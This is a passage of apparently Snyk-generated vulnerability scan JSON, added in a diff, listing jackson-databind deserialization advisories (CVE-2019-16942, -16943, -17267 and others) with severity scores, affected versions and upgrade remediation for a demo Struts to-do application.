"alternativeIds": [], + "disclosureTime": "2019-09-15T23:27:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Functional", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T23:27:25Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.008832Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-467016", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.10.0.pr1,2.10.0.pr2)", + "[,2.9.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": 
"https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2420", + "title": "GitHub Issue" + } + ], + "cvssDetails": [], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:32.899468Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.cxf.jaxrs.provider.XSLTJaxbProvider`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. 
The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d4983c740fec7d5576b207a8c30a63d3ea7443de)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2420)\n", + "epssDetails": null, + "identifiers": { + "CVE": [], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-09-16T14:43:42.115110Z", + "functions_new": [ + { + "version": [ + "[2.10.0.pr1,2.10.0.pr2)", + "[,2.9.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-09-16T14:37:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-09-16T14:37:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-06T13:58:32.899468Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + 
"com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469674", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "bsmali4" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10.1)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2478", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.688214Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:53.988000Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + 
"cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:57:50.462784Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.688214Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.988000Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered within `org.apache.commons.dbcp.datasources.SharedPoolDataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", + "epssDetails": { + "percentile": "0.73908", + "probability": "0.00404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16942" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-mx7p-6679-8g3q" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-02T08:02:18.178548Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-01T17:43:33Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-02T17:43:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.988000Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-469676", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "bsmali4" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.10.1)", + "[2.7.0,2.8.11.5)", + "[,2.6.7.3)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1", + "2.8.11.5", + "2.6.7.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2478", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.709990Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.024581Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.814203Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.709990Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.024581Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered as `com.p6spy.engine.spy.P6DataSource` was not blocked. An attacker could leverage this gadget type to perform Remote Code Execution attacks through deserialization.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.1, 2.8.11.5, 2.6.7.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9593e16cf5a3d289a9c584f7123639655de9ddac)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2478)\n", + "epssDetails": { + "percentile": "0.73908", + "probability": "0.00404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-16943" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-fmmc-742q-jg75" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-02T08:03:39.391997Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.1)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-01T17:43:33Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-02T17:43:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.024581Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + 
"io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-471943", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2460", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:59.172828Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": 
"2024-03-11T09:53:54.064844Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:04.701685Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:59.172828Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.064844Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. A Polymorphic Typing issue was discovered related to `net.sf.ehcache.hibernate.EhcacheJtaTransactionManagerLookup`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/191a4cdf87b56d2ddddb77edd895ee756b7f75eb)\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.3...jackson-databind-2.9.10)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2460)\n", + "epssDetails": { + "percentile": "0.85119", + "probability": "0.01174", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-17267" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-f3j5-rmmp-3fc5" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2019-10-07T10:05:31.629572Z", + "functions_new": [ + { + "version": [ + "[,2.9.10)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2019-10-07T01:14:26Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-10-07T01:14:26Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.064844Z", + 
"socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-472980", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Zhangxianhui" + ], + "semver": { + "vulnerable": [ + "[2.0.0, 2.9.10.1)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.10.1" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0, 2.9.10.1)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Blog Post" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/commit/b5a304a98590b6bb766134f9261e6566dcbbb6d0", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2498", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:52:13.712421Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.918541Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:58.282653Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:52:13.712421Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:53.918541Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. When Default Typing is enabled for an externally exposed 